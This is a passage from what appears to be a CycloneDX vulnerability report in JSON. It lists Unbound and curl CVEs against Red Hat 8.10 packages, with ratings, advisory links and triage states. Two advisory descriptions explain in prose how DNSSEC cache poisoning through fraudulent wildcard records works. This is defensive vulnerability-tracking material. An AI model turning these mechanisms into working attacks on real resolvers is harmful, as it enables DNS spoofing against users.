          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44690",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        345
      ],
      "description": "In NLnet Labs Unbound 1.7.0 up to and including 1.25.1, insufficient validation of the RRSIG.Labels field combined with premature cache writes during RFC 8198 aggressive NSEC processing leads to cache poisoning that permits a malicious actor controlling a single delegated zone to poison arbitrary sibling zones under NSEC-signed parent domains. A malicious actor with one registered domain under an NSEC-signed TLD can serve malicious insecure DNS responses for unrelated sibling domains (sharing the same parent zone). Arbitrary delegations that do not exist under the parent domain and are covered by the parent's NSEC chain can be brought into insecure existence by fraudulent wildcard DS records (less labels than expected, unknown algorithm) from the malicious sibling domain. This allows the malicious actor to inject insecure wildcard records for those delegations.",
      "recommendation": "Upgrade python3-unbound to version 1.16.2-5.14.el8_10; Upgrade unbound-libs to version 1.16.2-5.14.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44690"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55841"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55892"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44690"
        },
        {
          "url": "https://bugzilla.redhat.com/2503063"
        },
        {
          "url": "https://bugzilla.redhat.com/2503075"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2503063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2503075"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44690"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-55973"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55892.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55841"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44690.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55892.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44690"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44690"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44690.txt"
        }
      ],
      "published": "2026-07-22T14:17:19+00:00",
      "updated": "2026-07-24T13:57:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-46582",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        358
      ],
      "description": "In NLnet Labs Unbound 1.6.0 up to and including 1.25.1, a replay of a wildcard rrset as another piece of data, could be briefly considered DNSSEC secure based only on the RRSIG validation and stored into cache, before later validation treats it as bogus based on NSEC validation. When the resolving thread puts secure on the rrset, and another thread that is on the serve expired path then picks up the updated rrset contents with the secure status for a reply, it can be used to change a specific record, next to a wildcard that could be covered by the wildcard, into the wildcard. A malicious actor can exploit the possible poisonous effect by having any DNSSEC-singed domain (irrelevant to the victim domain) and a CNAME wrapper record that points to a record next to a wildcard (that could be covered by the wildcard). Then quering Unbound for the wildcard sibling record would seed the secure message. A later (after expiry) query for the CNAME wrapper would need to resolve the target sibling record. If the wildcard replay is injected into the response, the wildcard rrset will update the expired sibling record with a secure status before completing proper wildcard validation with NSEC records and eventually treating the CNAME wrapper answer as bogus. The updated poisoned rrset is now secure and points to the wildcard. This vulnerability is explicit for the serve expired path and needs injection of the signed wildcard rrset without the NSEC accompanying rrset.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46582"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46582"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46582"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46582"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-46582.txt"
        }
      ],
      "published": "2026-07-22T14:17:19+00:00",
      "updated": "2026-07-24T13:55:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295,
        319
      ],
      "description": "A vulnerability exists where a connection requiring TLS incorrectly reuses an\nexisting unencrypted connection from the same connection pool. If an initial\ntransfer is made in clear-text (via IMAP, SMTP, or POP3), a subsequent request\nto that same host bypasses the TLS requirement and instead transmit data\nunencrypted.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4873"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4873"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5fgw-rv54-prjx"
        },
        {
          "url": "https://hackerone.com/reports/3621851"
        },
        {
